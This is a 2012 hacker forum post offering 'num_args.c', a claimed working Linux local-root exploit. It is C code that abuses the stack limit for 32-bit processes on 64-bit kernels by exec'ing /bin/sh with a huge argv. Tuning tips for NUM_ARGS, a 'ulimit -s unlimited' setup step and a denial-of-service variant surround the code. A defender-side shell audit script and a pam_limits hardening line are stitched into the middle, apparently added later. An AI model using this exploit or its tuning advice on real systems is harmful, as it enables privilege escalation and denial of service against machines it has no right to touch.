[356dayer :P]: num_args.c – WORKING localroot leaked as an exploit-form but was coded ages ago and modded, so it has been archived here at CC

Posted on 5th January 2012 in Exploits

Oki just a quicky for yas.. but set up to run as a proper bash shell spawned, which is very kewl, as it was given thru a veryyyy leet dude… yet it's old… anyhow, let me know how it goes for thee :P and what numbers work in the NUM_ARGS for your kernel.. ya may want to play with that define a little ;)
xd

#HAXNET, #DARKNET, #HAXSHELLS, #MAGICSHELLS, #ALBASHELLS @ EFNET NETWORK, SOON ALSO ON UNDERNET PERHAPS, ALTHO FREENODE SEEMS A BIT NICER.. meh we see!
and one greet to pm, only coz I greet the other fkrs daily :P lol… joking again, well… not reallllly.. but ya will love me I hope. Oh yes, the first 'manpic' of me was found… good job to whoever did find it… as that was only one of a few but, yea… they've been around 2 yrs even, 3 nearly.. anyhow, here, since you prolly have seen it, I will show you a true criminal..
http://i.imgur.com/j5DzX.jpg
Ohhh you wanted this thing here…..

/*
   known for over two years, fixed in grsec and also in SOME x86_64 but still works.... play with shell spawn a bit
   bug is due to a bad limit on the max size of the stack for 32bit apps
   on a 64bit OS.   Instead of them being limited to 1/4th of a 32bit
   address space, they're limited to 1/4th of a 64bit address space -- oops!
   in combination with vanilla ASLR, it triggers a BUG() as the stack
   tries to expand around the address space when shifted
   Below mmap_min_addr you say? uh oh! ;)
   Reported to Ted Tso in December 2009
   Linus today (Aug 13 2010) silently fixes tangential issue:
   http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=320b2b8de12698082609ebbc1a17165727f4c893 <-- bug here, was d0s, can be d0s again, just make it 0xdeadbeef and your d0s will run fine locally on any 64/x86_64.
   The second bug here is that the memory usage explodes within the
   kernel from a single 128k allocation in userland
   The explosion of memory isn't accounted for by any task so it won't
   be terminated by the OOM killer
   curious what actual vuln was involved that they were trying
   to silently fix, as I don't think it's the one below
   clobbering data in a suid app by growing the stack into the mapping
   for the image? ;) 

   ulimit -s unlimited
   ./64

   SELinux is here to save us though with its fine-grained controls!
   Wait, it doesn't?
   Clearly the solution is to throw a buggy KVM on top of it
   Not enough?  Ok, we'll throw in an extra SELinux, that'll really
   throw those hackers off when they use the same exact exploit on the
   host as they do on the guest!
   COMMON CRITERIA HERE I COME!
xd says, fuck ur common whatever but, I do love u spenda, but now what was this crippled for... silly execve cripples are only reasons to make sure it is at least used as a pentest kit... and I do believe strangely this was submitted to AB also... but not sure if they've used it... however, I believe they may have, and this gives it a bit more confidence... thx to my best ever friends online and their support, #Haxnet and the Ops from it, also #Darknet, and of course Magicshells.com, for their continued support :)  thx iceman ;)  you're a top guy sometimes.
.... rambles a bit more... now the heroin is kickin in... ill bbl.... k.... bye.... now, any good finds on this like, ya can remove the per_svr_personality easily and this would change it, also, I'd be playin about with HOW the shell is executed ;)  anyhow, I have added 1 line then left it commented... but this is a working pvt leak.... well, it was 'bought' by idiots, who now realise they paid for shit nice friends from haxnet and other channels wrote!
fark u FD lists still, valdis/DR/Jono, all still suckarsees, oh and did I mention zx2c :P  lol joking man! he's about one of the rare nice ppl there, as with George, Richard, even Valdis is ok :s sometimes.. but anyhow, love to all who are rooting, and make sure any kernels etc, like any offsetting, is added and PMd to me.. like kernel versions etc.. which I may try to play with... it is a very nice bug if u read its commit... kinda a 2in1er.. better :s... enjoy... edited post by xd of haxnet ... f33r my arse, on your face. retard.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/personality.h>

#define NUM_ARGS 24550 // leave this alone unless you want this to become a 64bit d0s

int main(void) {
        char **args;
        char *str;
        int i;
        /* not needed, just makes it easier for machines with less RAM */
        personality(PER_LINUX32_3GB);
        /* one 128k string, reused for every argv slot */
        str = malloc(128 * 1024);
        if (str == NULL) {
                printf("[-] malloc failed\n");
                return 1;
        }
        memset(str, 'A', 128 * 1024 - 1);
        str[128 * 1024 - 1] = '\0';
        /* NUM_ARGS - 1 pointers to the same string, then the NULL terminator */
        args = malloc(NUM_ARGS * sizeof(char *));
        if (args == NULL) {
                printf("[-] malloc failed\n");
                return 1;
        }
        for (i = 0; i < (NUM_ARGS - 1); i++)
                args[i] = str;
        args[i] = NULL;
        //setuid(0);  // hrm.... worth a shot ;)  depends how ya compile it... -O2 ;)  etc... who knows... also, changed line below so works now.
        /* execve takes three arguments; the envp was missing, pass an empty environment */
        execve("/bin/sh", args, NULL);
        printf("[-] execve failed\n");
        return 0;
}

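A defender-side audit of the preconditions the PoC above relies on, plus the argv-size arithmetic behind the "1/4 of the address space" limit the header describes. This is an added example, not code from the original post or from the exploit's author; it assumes the PoC needs the stack rlimit raised to unlimited first (the header's `ulimit -s unlimited` step), and the 1 GiB threshold is simply 2^32 / 4.

```shell
#!/bin/sh
# Added example (not from the original post): audit the preconditions the
# 64.c PoC above relies on and work through its argv-size arithmetic.
# Assumption: the PoC needs the stack rlimit raised to "unlimited" first,
# as the header's "ulimit -s unlimited" step shows.

# classify_stack_limit LIMIT -> "risky" when the hard stack limit is
# unlimited (an unprivileged user can then run "ulimit -s unlimited"),
# "capped" otherwise.
classify_stack_limit() {
    case "$1" in
        unlimited|-1) echo risky ;;
        *)            echo capped ;;
    esac
}

# argv_bytes NUM_ARGS STRING_BYTES -> bytes execve has to copy onto the
# new stack when every argv slot points at the same string.
argv_bytes() {
    echo $(( $1 * $2 ))
}

# exceeds_32bit_quarter BYTES -> true when BYTES is larger than a quarter
# of a 32-bit address space (2^32 / 4 = 1073741824), the bound the header
# says a 32-bit process on a 64-bit kernel should have been held to.
exceeds_32bit_quarter() {
    [ "$1" -gt 1073741824 ]
}

audit_host() {
    hard=$(ulimit -H -s)
    echo "stack hard limit: $hard ($(classify_stack_limit "$hard"))"
    for f in /proc/sys/kernel/randomize_va_space /proc/sys/vm/mmap_min_addr; do
        if [ -r "$f" ]; then
            echo "$f: $(cat "$f")"
        fi
    done
    # The PoC's defaults: NUM_ARGS - 1 pointers to one 128 KiB string (131071 'A' + NUL).
    total=$(argv_bytes 24549 131072)
    if exceeds_32bit_quarter "$total"; then
        echo "PoC argv = $total bytes, above the 32-bit quarter: a correct limit rejects the execve"
    else
        echo "PoC argv = $total bytes, within the 32-bit quarter"
    fi
}

audit_host
```

Where unprivileged users should not be able to lift the limit, a pam_limits line such as `* hard stack 8192` in /etc/security/limits.conf keeps the `ulimit -s unlimited` step from succeeding.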

Now finally, I can go try BSD v9!
fuckazzzzzzzzzzzzzz
pimps to my homie paul, and we will r00l all very soon :>